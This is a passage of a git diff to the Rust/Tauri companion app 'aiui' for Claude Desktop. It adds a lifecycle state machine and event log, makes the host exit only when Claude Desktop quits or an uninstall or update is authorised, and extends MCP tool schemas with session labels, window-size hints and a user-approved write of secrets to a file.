+                logging::trace(&format!("[aiui] honouring ExitRequested: {reason}"));
                 housekeeping::pre_exit_cleanup(port, reason);
             }
 
@@ -1734,7 +1860,14 @@ pub fn run() {
                     // would otherwise be greeted by a leftover empty
                     // frame (v0.4.46, Bug B+).
                     sweep_orphan_dialog_window(app);
-                    show_settings_window(app);
+                    // BUT: macOS also fires Reopen as a side-effect of a dialog
+                    // window closing. Surfacing settings then is the
+                    // 2026-05-31 "setup window popped up after I closed a
+                    // dialog" bug. Only surface settings for a *genuine*
+                    // reactivation — i.e. not right after a dialog teardown.
+                    if !dialog_torn_down_recently() {
+                        show_settings_window(app);
+                    }
                 }
             }
             #[cfg(not(target_os = "macos"))]
diff --git a/companion/src-tauri/src/lifecycle_log.rs b/companion/src-tauri/src/lifecycle_log.rs
new file mode 100644
index 0000000..9edad76
--- /dev/null
+++ b/companion/src-tauri/src/lifecycle_log.rs
@@ -0,0 +1,214 @@
+//! Issue #137 cross-cutting: an explicit lifecycle state machine + named
+//! event log, replacing the ad-hoc `trace()` calls scattered across the
+//! host-lifetime decision points.
+//!
+//! The whole 0.4.x whack-a-mole came from the lifetime logic being implicit:
+//! a child-counter proxy, a 60 s grace, scattered traces — no single place
+//! that said "we are in phase X and just moved to Y because Z". This module
+//! makes the host's lifetime an explicit, named [`Phase`] with logged
+//! transitions, plus a bounded ring of the most recent [`LifecycleEvent`]s
+//! for post-hoc diagnosis (the coverage gap that made the instability so hard
+//! to pin down).
+//!
+//! It is deliberately tiny and lock-simple: the lifetime path is low
+//! frequency (a few events per disconnect edge), so a single `Mutex` and a
+//! `VecDeque` are plenty. Recording an event also emits a structured
+//! `trace()` line so existing log tooling keeps working.
+
+use std::collections::VecDeque;
+use std::sync::{Mutex, OnceLock};
+use std::time::Instant;
+
+/// Max events retained in the in-memory ring (oldest dropped past this).
+const RING_CAP: usize = 256;
+
+/// The host's lifetime phase. A small, total state set — every transition
+/// goes through [`transition`], which logs it.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum Phase {
+    /// Process up, HTTP not yet serving.
+    Starting,
+    /// HTTP bound, accepting renders — the normal running state.
+    Serving,
+    /// Last MCP child disconnected; the 5 s grace timer is armed and we are
+    /// about to re-check Claude Desktop liveness.
+    GracePending,
+    /// A terminal exit has been authorized; process is on its way out.
+    Exiting,
+}
+
+impl Phase {
+    fn name(self) -> &'static str {
+        match self {
+            Phase::Starting => "Starting",
+            Phase::Serving => "Serving",
+            Phase::GracePending => "GracePending",
+            Phase::Exiting => "Exiting",
+        }
+    }
+}
+
+/// Named lifecycle events. These are the points that used to be bare
+/// `trace()` strings; naming them makes the event log greppable and the
+/// state machine's reasoning explicit.
+#[derive(Debug, Clone)]
+pub enum LifecycleEvent {
+    /// Process startup; `interactive` = desktop session (GUI may show) vs
+    /// headless/SSH.
+    Startup { interactive: bool },
+    /// HTTP server bound and serving on the given port.
+    Serving { port: u16 },
+    /// An MCP-stdio child attached / detached; carries the new live count.
+    ChildAttached { count: usize },
+    ChildDetached { count: usize },
+    /// Last child gone — grace timer armed for `secs` before the liveness
+    /// re-check.
+    GraceArmed { secs: u64 },
+    /// Grace elapsed and resolved. `outcome` is "stay" or "exit"; the two
+    /// inputs to that decision are recorded for forensics.
+    GraceResolved {
+        outcome: &'static str,
+        claude_desktop_running: bool,
+        child_returned: bool,
+    },
+    /// A window-close was treated as hide (not exit) — Invariant I2: a
+    /// window-X never kills the host.
+    WindowHidden,
+    /// Tauri's `ExitRequested` gate default-denied a quit attempt.
+    ExitDenied,
+    /// Terminal exit authorized; `reason` names the cause, e.g.
+    /// "exit-claude-desktop-gone" or "exit-authorized-uninstall-or-update".
+    HostExit { reason: &'static str },
+}
+
+impl LifecycleEvent {
+    fn render(&self) -> String {
+        match self {
+            LifecycleEvent::Startup { interactive } => {
+                format!("startup (interactive={interactive})")
+            }
+            LifecycleEvent::Serving { port } => format!("serving on :{port}"),
+            LifecycleEvent::ChildAttached { count } => format!("child attached (count={count})"),
+            LifecycleEvent::ChildDetached { count } => format!("child detached (count={count})"),
+            LifecycleEvent::GraceArmed { secs } => format!("grace armed ({secs}s)"),
+            LifecycleEvent::GraceResolved {
+                outcome,
+                claude_desktop_running,
+                child_returned,
+            } => format!(
+                "grace resolved → {outcome} (claude_desktop_running={claude_desktop_running}, child_returned={child_returned})"
+            ),
+            LifecycleEvent::WindowHidden => "window close treated as hide".to_string(),
+            LifecycleEvent::ExitDenied => "ExitRequested default-denied".to_string(),
+            LifecycleEvent::HostExit { reason } => format!("host exit authorized ({reason})"),
+        }
+    }
+}
+
+fn ring() -> &'static Mutex<VecDeque<String>> {
+    static RING: OnceLock<Mutex<VecDeque<String>>> = OnceLock::new();
+    RING.get_or_init(|| Mutex::new(VecDeque::with_capacity(RING_CAP)))
+}
+
+fn epoch() -> Instant {
+    static EPOCH: OnceLock<Instant> = OnceLock::new();
+    *EPOCH.get_or_init(Instant::now)
+}
+
+fn phase_cell() -> &'static Mutex<Phase> {
+    static PHASE: OnceLock<Mutex<Phase>> = OnceLock::new();
+    PHASE.get_or_init(|| Mutex::new(Phase::Starting))
+}
+
+/// Record a named lifecycle event: push to the bounded ring and emit a
+/// structured `trace()` line. Never panics on a poisoned lock — the guard
+/// is recovered, so events keep being retained after a panic elsewhere.
+pub fn record(ev: LifecycleEvent) {
+    push_line(&ev.render());
+}
+
+/// Move to `next` phase, logging the transition (no log if unchanged). A
+/// poisoned phase lock is recovered rather than silently skipping the update.
+pub fn transition(next: Phase) {
+    let prev = {
+        let mut p = phase_cell().lock().unwrap_or_else(|e| e.into_inner());
+        std::mem::replace(&mut *p, next)
+    };
+    if prev != next {
+        record_transition(prev, next);
+    }
+}
+
+/// Log a phase change through the same trace + ring path as [`record`].
+fn record_transition(prev: Phase, next: Phase) {
+    push_line(&format!("phase {} → {}", prev.name(), next.name()));
+}
+
+/// Shared sink for events and phase transitions: stamps `msg` with the ms
+/// elapsed since `epoch()`, emits it via `trace()`, then appends it to the
+/// ring, evicting the oldest entry once `RING_CAP` lines are held.
+fn push_line(msg: &str) {
+    let ms = epoch().elapsed().as_millis();
+    let line = format!("[{ms}ms] {msg}");
+    crate::logging::trace(&format!("lifecycle {line}"));
+    // The trace is emitted before taking the lock, so the guard is held only
+    // for the bounded pop/push below.
+    let mut q = ring().lock().unwrap_or_else(|e| e.into_inner());
+    if q.len() >= RING_CAP {
+        q.pop_front();
+    }
+    q.push_back(line);
+}
+
+/// Current lifetime phase (diagnostics / health); survives a poisoned lock.
+pub fn current_phase() -> Phase {
+    *phase_cell().lock().unwrap_or_else(|e| e.into_inner())
+}
+
+/// Snapshot of the recent event ring, oldest first — for a diagnostic dump.
+/// A poisoned lock is recovered rather than yielding an empty snapshot, so
+/// the exit-time forensic dump still has its history.
+pub fn recent() -> Vec<String> {
+    let q = ring().lock().unwrap_or_else(|e| e.into_inner());
+    q.iter().cloned().collect()
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn records_events_and_caps_ring() {
+        for i in 0..(RING_CAP + 50) {
+            record(LifecycleEvent::ChildAttached { count: i });
+        }
+        let r = recent();
+        assert!(r.len() <= RING_CAP, "ring is bounded, got {}", r.len());
+        // Oldest dropped: count=0 has > RING_CAP pushes after it, so it is gone.
+        assert!(!r.iter().any(|l| l.contains("child attached (count=0)")));
+    }
+
+    #[test]
+    fn transition_updates_phase_and_is_idempotent() {
+        // `transition` is the only mutator of the process-global phase, and
+        // only this test calls it, so asserting `current_phase()` is race-free
+        // (unlike the shared event ring, which other tests spam concurrently).
+        transition(Phase::GracePending);
+        assert_eq!(current_phase(), Phase::GracePending);
+        transition(Phase::GracePending); // idempotent — no panic, phase holds
+        assert_eq!(current_phase(), Phase::GracePending);
+        transition(Phase::Serving);
+        assert_eq!(current_phase(), Phase::Serving);
+    }
+
+    #[test]
+    fn event_render_is_human_legible() {
+        let ev = LifecycleEvent::GraceResolved {
+            outcome: "exit",
+            claude_desktop_running: false,
+            child_returned: false,
+        };
+        let s = ev.render();
+        assert!(s.contains("exit") && s.contains("claude_desktop_running=false"));
+    }
+}
diff --git a/companion/src-tauri/src/lifetime.rs b/companion/src-tauri/src/lifetime.rs
index 262c68d..1cfe321 100644
--- a/companion/src-tauri/src/lifetime.rs
+++ b/companion/src-tauri/src/lifetime.rs
@@ -4,10 +4,21 @@
 //! a Windows named pipe on Windows — and each `aiui --mcp-stdio` child
 //! connects on startup and holds the stream open. When the child exits
 //! (Claude Desktop closes it), the OS tears down the stream and the GUI
-//! observes an EOF. Once the last client disconnects the GUI starts a 60s
-//! grace timer and exits if nobody re-connects.
+//! observes an EOF.
 //!
-//! Event-driven, no polling.
+//! Lifetime invariant (I1, stabilization-plan): the child counter does **not**
+//! decide the host's lifetime. The last-child-disconnect edge is only a
+//! *trigger* — it prompts the one question that actually decides whether we may
+//! exit: is our host, Claude Desktop, still alive? While Claude Desktop runs we
+//! stay, regardless of child count (a dropped/re-spawned MCP server, Cowork
+//! churn). Only when Claude Desktop is gone does a short grace then exit follow
+//! (the host follows the Wirt). The 60 s child-count grace that used to gate
+//! exit was itself the root-cause bug — it killed the host during ordinary
+//! churn while Claude Desktop was very much alive.
+//!
+//! Event-driven, no continuous polling: the only liveness probe is a single
+//! `is_claude_desktop_running()` call per disconnect edge (plus one re-check
+//! after the short grace).
 //!
 //! Cross-platform note: the public surface (`socket_path`, `gui_serve`,
 //! `mcp_attach`, `LifetimeStats`) is identical on both OSes. The only
@@ -29,7 +40,87 @@ use tokio::net::windows::named_pipe::{
 };
 use tokio::sync::Notify;
 
-pub const SHUTDOWN_GRACE_SECS: u64 = 60;
+/// Short grace after the last MCP-stdio child disconnects *and* Claude Desktop
+/// is no longer detected, before the host exits. It absorbs two transients:
+/// (a) a Claude Desktop quit→relaunch (its own update / a user restart), and
+/// (b) the brief teardown window where Claude Desktop has already closed its
+/// children's stdin (firing our edge) but its process is still terminating, so
+/// `pgrep` could momentarily go either way. We re-check Claude-Desktop liveness at
+/// expiry and only exit if it is *still* gone. ≤5 s per the spec; nothing polls
+/// in a loop.
+pub const SHUTDOWN_GRACE_SECS: u64 = 5;
+
+/// The single exit authority (Invariant I1). A host *planned* exit is legitimate
+/// in exactly three cases: (b) aiui is uninstalled or (c) restarting into an
+/// update — both signalled explicitly via [`ExitAuthority`] by `quit_app` /
+/// the updater — or (a) Claude Desktop, the host process aiui lives with, has
+/// terminated. Every other process exit is a crash, never a clean shutdown.
+///
+/// Pure so it can be unit-tested without a live Claude Desktop or a running
+/// Tauri app: callers pass the two facts in. The impure shell reads them from
+/// [`ExitAuthority`] state and `setup::is_claude_desktop_running()`.
+pub fn host_should_exit(explicit_uninstall_or_update: bool, claude_desktop_running: bool) -> bool {
+    explicit_uninstall_or_update || !claude_desktop_running
+}
+
+/// What the post-grace re-check decides. The child counter participates only as
+/// "did a child come back" — it never independently authorizes an exit; that is
+/// solely `!claude_desktop_running` (Invariant I1).
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum GraceOutcome {
+    /// Claude Desktop is alive again, or a child re-attached — stay headless.
+    Stay,
+    /// Claude Desktop is still gone and no child returned — the host follows
+    /// the Wirt and exits.
+    Exit,
+}
+
+/// Resolve the short grace once it expires. `claude_desktop_running` is a
+/// fresh liveness probe; `child_returned` is true if any MCP-stdio child
+/// re-attached during the grace. Either signal keeps the host alive; only
+/// "Wirt gone and nothing came back" exits — liveness always wins (I1).
+pub fn grace_outcome(child_returned: bool, claude_desktop_running: bool) -> GraceOutcome {
+    match (claude_desktop_running, child_returned) {
+        (false, false) => GraceOutcome::Exit,
+        // Any other combination: the Wirt is alive or a child is back.
+        _ => GraceOutcome::Stay,
+    }
+}
+
+/// Explicit exit authority for the two non-Wirt-death cases (uninstall, update
+/// restart). A plain latch: set once by `quit_app` / the updater right before
+/// they ask Tauri to terminate, read by the `ExitRequested` default-deny gate
+/// so those — and only those — Tauri-initiated exits are honoured. Everything
+/// else Tauri tries (last-window-close, ⌘Q, OS quit-all) is vetoed while Claude
+/// Desktop is alive.
+pub struct ExitAuthority {
+    authorized: std::sync::atomic::AtomicBool,
+}
+
+impl ExitAuthority {
+    pub fn new() -> Self {
+        Self {
+            authorized: std::sync::atomic::AtomicBool::new(false),
+        }
+    }
+
+    /// Latch the authority on. Irreversible by design — once we have decided to
+    /// uninstall or restart into an update there is no "un-deciding" before the
+    /// process is gone.
+    pub fn authorize(&self) {
+        self.authorized.store(true, Ordering::SeqCst);
+    }
+
+    pub fn is_authorized(&self) -> bool {
+        self.authorized.load(Ordering::SeqCst)
+    }
+}
+
+impl Default for ExitAuthority {
+    fn default() -> Self {
+        Self::new()
+    }
+}
 
 /// Returns the per-OS handle the GUI listens on and MCP-stdio children
 /// connect to.
@@ -74,10 +165,11 @@ impl LifetimeStats {
     }
 }
 
-/// GUI-side: bind the channel, accept connections, and self-terminate after a
-/// grace period once all clients are gone. Increments/decrements the shared
-/// `conns` counter on every connect/disconnect so `/health` can report the
-/// live child count without polling.
+/// GUI-side: bind the channel and accept connections. Increments/decrements the
+/// shared `conns` counter on every connect/disconnect so `/health` can report
+/// the live child count without polling. When the last child leaves it pokes
+/// the shutdown watcher, which exits *only* if the Wirt (Claude Desktop) is also
+/// gone — the counter never terminates the process on its own (Invariant I1).
 ///
 /// Multi-instance hardening (since 0.4.33): if the channel already
 /// answers a connection, another aiui-app is alive and we are the
@@ -150,6 +242,9 @@ async fn gui_serve_unix(sock: PathBuf, app: AppHandle, conns: Arc<AtomicUsize>,
             Ok((mut stream, _)) => {
                 let n = conns.fetch_add(1, Ordering::SeqCst) + 1;
                 trace(&format!("lifetime: client connected, active={n}"));
+                crate::lifecycle_log::record(
+                    crate::lifecycle_log::LifecycleEvent::ChildAttached { count: n },
+                );
                 let conns = conns.clone();
                 let wake = wake.clone();
                 tokio::spawn(async move {
@@ -162,6 +257,9 @@ async fn gui_serve_unix(sock: PathBuf, app: AppHandle, conns: Arc<AtomicUsize>,
                     }
                     let left = conns.fetch_sub(1, Ordering::SeqCst) - 1;
                     trace(&format!("lifetime: client disconnected, active={left}"));
+                    crate::lifecycle_log::record(
+                        crate::lifecycle_log::LifecycleEvent::ChildDetached { count: left },
+                    );
                     if left == 0 {
                         wake.notify_one();
                     }
@@ -256,6 +354,9 @@ async fn gui_serve_windows(sock: PathBuf, app: AppHandle, conns: Arc<AtomicUsize
 
         let n = conns.fetch_add(1, Ordering::SeqCst) + 1;
         trace(&format!("lifetime: client connected, active={n}"));
+        crate::lifecycle_log::record(
+            crate::lifecycle_log::LifecycleEvent::ChildAttached { count: n },
+        );
         let conns = conns.clone();
         let wake = wake.clone();
         tokio::spawn(async move {
@@ -269,6 +370,9 @@ async fn gui_serve_windows(sock: PathBuf, app: AppHandle, conns: Arc<AtomicUsize
             }
             let left = conns.fetch_sub(1, Ordering::SeqCst) - 1;
             trace(&format!("lifetime: client disconnected, active={left}"));
+            crate::lifecycle_log::record(
+                crate::lifecycle_log::LifecycleEvent::ChildDetached { count: left },
+            );
             if left == 0 {
                 wake.notify_one();
             }
@@ -276,10 +380,14 @@ async fn gui_serve_windows(sock: PathBuf, app: AppHandle, conns: Arc<AtomicUsize
     }
 }
 
-/// Shared shutdown timer wiring used by both backends. Returns the wake
-/// `Notify` that connect/disconnect handlers signal — armed once when
-/// the last client leaves, and cancellable by a fresh connect within
-/// the grace period.
+/// Shared shutdown watcher used by both backends. Returns the wake `Notify`
+/// that the disconnect handlers signal when the *last* child leaves.
+///
+/// Invariant I1: the child counter is a trigger, not an authority. This edge
+/// does not by itself end the process — it prompts a short grace and then a
+/// single Claude-Desktop liveness probe ([`grace_outcome`]). The host exits
+/// only when its Wirt (Claude Desktop) is gone; while Claude Desktop is alive
+/// we stay headless no matter how the child count moves.
 fn make_shutdown_watcher(conns: Arc<AtomicUsize>, app: AppHandle, http_port: u16) -> Arc<Notify> {
     let wake = Arc::new(Notify::new());
     let conns_w = conns.clone();
@@ -287,27 +395,73 @@ fn make_shutdown_watcher(conns: Arc<AtomicUsize>, app: AppHandle, http_port: u16
     tokio::spawn(async move {
         loop {
             wake_w.notified().await;
+            // Edge: the last MCP-stdio child just disconnected. The counter is
+            // only a trigger (I1) — it does not authorize an exit. If a child
+            // re-attached already, there is nothing to decide.
             if conns_w.load(Ordering::SeqCst) > 0 {
                 continue;
             }
+            // Short grace, then let Claude-Desktop liveness — never the child
+            // count — make the call. The grace absorbs (a) a Claude Desktop
+            // quit→relaunch (its own update, a user restart) and (b) the
+            // teardown window where Claude Desktop has already closed our
+            // child's stdin (firing this very edge) but its process is still
+            // terminating, so a probe *now* could read either way.
+            //
+            // We arm the grace even when Claude Desktop currently looks alive:
+            // during ordinary churn it simply expires into `Stay`, and arming
+            // unconditionally is exactly what closes the teardown race that a
+            // "skip the grace if CD looks alive" shortcut would leave open —
+            // otherwise a probe catching CD mid-quit as "alive" would `Stay`
+            // with no further edge ever firing, stranding the host alive after
+            // its Wirt is gone (a Step-2 regression). The cost is a single 5 s
+            // timer + one `pgrep` per disconnect edge — no continuous poll.
             trace(&format!(
-                "lifetime: no clients, grace timer {SHUTDOWN_GRACE_SECS}s"
+                "lifetime: last child gone — grace {SHUTDOWN_GRACE_SECS}s then re-check Claude Desktop liveness"
             ));
-            tokio::select! {
-                _ = tokio::time::sleep(Duration::from_secs(SHUTDOWN_GRACE_SECS)) => {
-                    if conns_w.load(Ordering::SeqCst) == 0 {
-                        trace("lifetime: grace expired, exiting");
-                        // Hard exit bypassing Tauri's ExitRequested dance —
-                        // Cmd-Q and window-close are deliberately blocked
-                        // there, so the only legitimate shutdown path is
-                        // this one.
-                        crate::housekeeping::pre_exit_cleanup(http_port, "grace-expired");
-                        let _ = app;
-                        std::process::exit(0);
-                    }
+            crate::lifecycle_log::transition(crate::lifecycle_log::Phase::GracePending);
+            crate::lifecycle_log::record(crate::lifecycle_log::LifecycleEvent::GraceArmed {
+                secs: SHUTDOWN_GRACE_SECS,
+            });
+            tokio::time::sleep(Duration::from_secs(SHUTDOWN_GRACE_SECS)).await;
+            let child_returned = conns_w.load(Ordering::SeqCst) > 0;
+            let cd_running = crate::setup::is_claude_desktop_running();
+            let outcome = grace_outcome(child_returned, cd_running);
+            crate::lifecycle_log::record(crate::lifecycle_log::LifecycleEvent::GraceResolved {
+                outcome: match outcome {
+                    GraceOutcome::Stay => "stay",
+                    GraceOutcome::Exit => "exit",
+                },
+                claude_desktop_running: cd_running,
+                child_returned,
+            });
+            match outcome {
+                GraceOutcome::Stay => {
+                    crate::lifecycle_log::transition(crate::lifecycle_log::Phase::Serving);
+                    trace(&format!(
+                        "lifetime: staying after grace \
+                         (claude_desktop_running={cd_running}, child_returned={child_returned})"
+                    ));
                 }
-                _ = wake_w.notified() => {
-                    trace("lifetime: new client within grace, staying");
+                GraceOutcome::Exit => {
+                    crate::lifecycle_log::transition(crate::lifecycle_log::Phase::Exiting);
+                    crate::lifecycle_log::record(crate::lifecycle_log::LifecycleEvent::HostExit {
+                        reason: "claude-desktop-gone",
+                    });
+                    trace(
+                        "lifetime: Claude Desktop gone after grace and no child returned — \
+                         host follows Wirt, exiting",
+                    );
+                    for line in crate::lifecycle_log::recent() {
+                        trace(&format!("lifecycle-dump {line}"));
+                    }
+                    // Hard exit: this is exit case (a), the watcher's own
+                    // authority. It bypasses Tauri's ExitRequested gate (which
+                    // default-denies) because the gate has no way to know the
+                    // watcher already established `!is_claude_desktop_running()`.
+                    crate::housekeeping::pre_exit_cleanup(http_port, "claude-desktop-gone");
+                    let _ = app;
+                    std::process::exit(0);
                 }
             }
         }
@@ -476,4 +630,63 @@ mod tests {
         // pure. Real behavior is exercised in integration tests.
         let _ = is_interactive_session();
     }
+
+    // --- Step-1 verification mini-harness (stabilization-plan §Step 2) ---
+    //
+    // The decision core is pulled out as pure functions so the two invariants
+    // can be asserted without a live Claude Desktop or a running Tauri app:
+    //   * the host survives a child flap as long as Claude Desktop runs, and
+    //   * the host exits once Claude Desktop quits.
+    // These mirror exactly the (child_returned, claude_desktop_running) facts
+    // the watcher reads at grace expiry and the (explicit, cd_running) facts
+    // the ExitRequested gate reads.
+
+    #[test]
+    fn host_stays_while_claude_desktop_runs() {
+        // I1: Claude Desktop alive, no explicit uninstall/update — never exit.
+        let exit_planned = host_should_exit(false, true);
+        assert!(!exit_planned);
+    }
+
+    #[test]
+    fn host_exits_when_claude_desktop_quits() {
+        let (explicit, cd_running) = (false, false); // case (a): Wirt gone
+        assert!(host_should_exit(explicit, cd_running));
+    }
+
+    #[test]
+    fn host_exits_on_explicit_uninstall_or_update_even_if_cd_alive() {
+        // Cases (b)/(c): uninstall / update-restart win over CD liveness.
+        for cd_running in [true, false] {
+            assert!(host_should_exit(true, cd_running));
+        }
+    }
+
+    #[test]
+    fn child_flap_with_claude_desktop_alive_stays() {
+        // First row is the pivotal regression: the last child left (Cowork
+        // churn / MCP re-spawn) while Claude Desktop is alive — the case the
+        // old 60 s child-count grace wrongly turned into an exit. The other
+        // rows: a child re-attaching during the grace trivially keeps us up.
+        for (child_returned, cd_running) in [(false, true), (true, true), (true, false)] {
+            assert_eq!(grace_outcome(child_returned, cd_running), GraceOutcome::Stay);
+        }
+    }
+
+    #[test]
+    fn claude_desktop_quit_with_no_child_exits() {
+        // Grace over, Wirt still gone, no child back → the host follows it.
+        assert!(matches!(grace_outcome(false, false), GraceOutcome::Exit));
+    }
+
+    #[test]
+    fn exit_authority_latches() {
+        let latch = ExitAuthority::new();
+        assert!(!latch.is_authorized());
+        // Idempotent: set by the first call, still set after the second.
+        for _ in 0..2 {
+            latch.authorize();
+            assert!(latch.is_authorized());
+        }
+    }
 }
diff --git a/companion/src-tauri/src/mcp.rs b/companion/src-tauri/src/mcp.rs
index f7696b3..e89bcb2 100644
--- a/companion/src-tauri/src/mcp.rs
+++ b/companion/src-tauri/src/mcp.rs
@@ -275,6 +275,7 @@ fn tools_list() -> Value {
                 "required": ["title"],
                 "properties": {
                     "title": { "type": "string", "description": "Decision as a question, ≤ 10 words." },
+                    "session": { "type": "string", "description": "Optional short human label for the session this dialog belongs to (project/task name). Shown in the window chrome so the user can tell parallel dialogs apart." },
                     "message": { "type": "string", "description": "One sentence stating the concrete consequence." },
                     "header": { "type": "string", "description": "Short chip above the title (≤ 14 chars)." },
                     "destructive": { "type": "boolean", "default": false, "description": "Red confirm button — for deletions/rollbacks only." },
@@ -300,6 +301,7 @@ fn tools_list() -> Value {
                 "type": "object",
                 "required": ["question", "options"],
                 "properties": {
+                    "session": { "type": "string", "description": "Optional short human label for the session this dialog belongs to (project/task name). Shown in the window chrome so the user can tell parallel dialogs apart." },
                     "question": { "type": "string", "description": "Full question, imperative or interrogative." },
                     "options": {
                         "type": "array",
@@ -322,11 +324,12 @@ fn tools_list() -> Value {
         },
         {
             "name": "form",
-            "description": "Whenever the user needs to provide ≥ 2 related inputs, or any single input that doesn't belong in chat (secret, date/datetime/range, bounded number, sortable ranking, multi-select, color pick, table-row triage with column context, image confirm/grid), call this tool instead of typing the questions one by one. Fields: text, password, number, select, checkbox, slider, date, datetime, date_range, color, static_text, markdown, image, mermaid, wireframe, image_grid, list, table, tree. Group long forms with `tabs: [{label, fields: [...]}]` (one submit, all tabs validated). Footer actions are top-level on the form (`actions: [...]`), NOT inside a tab — they always render at the window's bottom. Action variants: primary (blue), success (green), destructive (red). Returns {cancelled, action?, values}. For yes/no, use `confirm`. For one-of-N pick, use `ask`. Sortable list field shape (most common stumble — always include `value` per item): {\"kind\":\"list\",\"name\":\"rank\",\"label\":\"Sortieren\",\"sortable\":true,\"items\":[{\"label\":\"A\",\"value\":\"a\"},{\"label\":\"B\",\"value\":\"b\"}]}. Image fields (`image`, `image_grid`, list-item `thumbnail`): `src` accepts (1) an absolute or `~/`-rooted local path — aiui's bridge on YOUR host reads it and inlines as `data:`; (2) an `http(s)://` URL — Mac-companion fetches and inlines; (3) a `data:` URL — pass through. Pick the path form when the file is on disk on your host. Relative paths and cross-host paths don't resolve. Never base64-roundtrip through a shell pipeline — build the `data:` URL in your runtime. For schematic visualisations (flowcharts, sequence/state diagrams, gantt, mind-maps) use the `mermaid` field instead of ASCII art: `{\"kind\":\"mermaid\",\"source\":\"graph TD; A --> B; B --> C\"}`. 
For UI-layout mockups (dashboard tiles, hardware-UI panels, login screens, anything with fixed-position boxes-and-labels) use the `wireframe` field — declarative panel grid, NOT ASCII boxes-and-pipes: `{\"kind\":\"wireframe\",\"columns\":3,\"panels\":[{\"title\":\"STATUS\",\"content\":\"Tiefe: 18 m\\nKurs: 270°\",\"col_span\":1},{\"title\":\"EMPFANG\",\"content\":\"14:32 [STARK]…\",\"col_span\":2}]}`. Each panel has optional `title` (uppercase header), `content` (multi-line monospace text, escape `\\n`), `col_span`/`row_span` (default 1), and `tone` (\"default\"/\"muted\"/\"highlight\"). See the aiui skill for the full field catalog. **This tool blocks until the user submits or cancels. Response can take minutes (longer for complex forms) — do not assume aiui is broken on slow response, the user is filling the form. The companion sends MCP progress notifications every ~10 s while waiting.**",
+            "description": "Whenever the user needs to provide ≥ 2 related inputs, or any single input that doesn't belong in chat (secret, date/datetime/range, bounded number, sortable ranking, multi-select, color pick, table-row triage with column context, image confirm/grid), call this tool instead of typing the questions one by one. Fields: text, password, secret, number, select, checkbox, slider, date, datetime, date_range, color, static_text, markdown, image, mermaid, wireframe, image_grid, list, table, tree. **File-write / secret capture (#135):** any input field may carry an optional `target` to write the entered value to a file ON THE HOST THE AGENT RUNS ON when the user submits (the affirmative button IS the per-write approval; the user sees the path first): `{\"kind\":\"secret\",\"name\":\"pat\",\"label\":\"GitHub PAT\",\"target\":{\"mode\":\"create\",\"path\":\"~/.github_tokens/byte5ai\",\"perm\":\"0600\",\"overwrite\":true}}`. `mode`: `create` (write raw value; needs `overwrite:true` to clobber) or `substitute` (replace a `placeholder` that occurs exactly once in an existing file — for YAML/TOML/INI/etc; choose a DISTINCTIVE sentinel that can't collide with real file content, e.g. `__AIUI_SECRET_GITHUB_PAT__`, not a common word — if it occurs 0 or >1 times the write is refused with an error, never misapplied to the wrong spot). A `secret`-kind field is **write-only**: its value is NEVER returned to you (result carries only `{written, target, bytes}`); use it precisely so a credential the user types never enters this conversation. Non-secret fields with a `target` are written AND returned. The destination is always the agent's own host: the aiui module already running there (the native app locally, the bridge on a remote SSH session) performs the write as a LOCAL file operation, so `create` and `substitute` both work identically local and remote — and you cannot target a foreign host. Errors come back as `{written:false, error}`. 
Group long forms with `tabs: [{label, fields: [...]}]` (one submit, all tabs validated). Footer actions are top-level on the form (`actions: [...]`), NOT inside a tab — they always render at the window's bottom. Action variants: primary (blue), success (green), destructive (red). Returns {cancelled, action?, values}. For yes/no, use `confirm`. For one-of-N pick, use `ask`. Sortable list field shape (most common stumble — always include `value` per item): {\"kind\":\"list\",\"name\":\"rank\",\"label\":\"Sortieren\",\"sortable\":true,\"items\":[{\"label\":\"A\",\"value\":\"a\"},{\"label\":\"B\",\"value\":\"b\"}]}. Image fields (`image`, `image_grid`, list-item `thumbnail`): `src` accepts (1) an absolute or `~/`-rooted local path — aiui's bridge on YOUR host reads it and inlines as `data:`; (2) an `http(s)://` URL — Mac-companion fetches and inlines; (3) a `data:` URL — pass through. Pick the path form when the file is on disk on your host. Relative paths and cross-host paths don't resolve. Never base64-roundtrip through a shell pipeline — build the `data:` URL in your runtime. For schematic visualisations (flowcharts, sequence/state diagrams, gantt, mind-maps) use the `mermaid` field instead of ASCII art: `{\"kind\":\"mermaid\",\"source\":\"graph TD; A --> B; B --> C\"}`. For UI-layout mockups (dashboard tiles, hardware-UI panels, login screens, anything with fixed-position boxes-and-labels) use the `wireframe` field — declarative panel grid, NOT ASCII boxes-and-pipes: `{\"kind\":\"wireframe\",\"columns\":3,\"panels\":[{\"title\":\"STATUS\",\"content\":\"Tiefe: 18 m\\nKurs: 270°\",\"col_span\":1},{\"title\":\"EMPFANG\",\"content\":\"14:32 [STARK]…\",\"col_span\":2}]}`. Each panel has optional `title` (uppercase header), `content` (multi-line monospace text, escape `\\n`), `col_span`/`row_span` (default 1), and `tone` (\"default\"/\"muted\"/\"highlight\"). See the aiui skill for the full field catalog. **This tool blocks until the user submits or cancels. 
Response can take minutes (longer for complex forms) — do not assume aiui is broken on slow response, the user is filling the form. The companion sends MCP progress notifications every ~10 s while waiting.**",
             "inputSchema": {
                 "type": "object",
                 "required": ["title"],
                 "properties": {
+                    "session": { "type": "string", "description": "Optional short human label for the session this dialog belongs to (project/task name). Shown in the window chrome so the user can tell parallel dialogs apart." },
                     "title": { "type": "string" },
                     "fields": { "type": "array", "items": { "type": "object" }, "description": "Flat field list. Use this OR `tabs`, not both." },
                     "tabs": {
@@ -345,7 +348,62 @@ fn tools_list() -> Value {
                     "header": { "type": "string" },
                     "actions": { "type": "array", "items": { "type": "object" } },
                     "submit_label": { "type": "string" },
-                    "cancel_label": { "type": "string" }
+                    "cancel_label": { "type": "string" },
+                    "size": { "type": "string", "enum": ["s", "m", "l"], "description": "Starting window size hint: s (compact), m (roomy), l (large). aiui picks good local defaults and clamps to the screen. The window is always resizable; this only sets the *initial* size, and never opens smaller than the content needs. Use m/l for forms with images, tables, wireframes, or many fields so they don't open cramped." },
+                    "width": { "type": "number", "description": "Explicit starting window width in logical px (overrides `size`). Rarely needed — prefer `size`." },
+                    "height": { "type": "number", "description": "Explicit starting window height in logical px (overrides `size`). Rarely needed — prefer `size`." }
+                }
+            }
+        },
+        {
+            "name": "gallery",
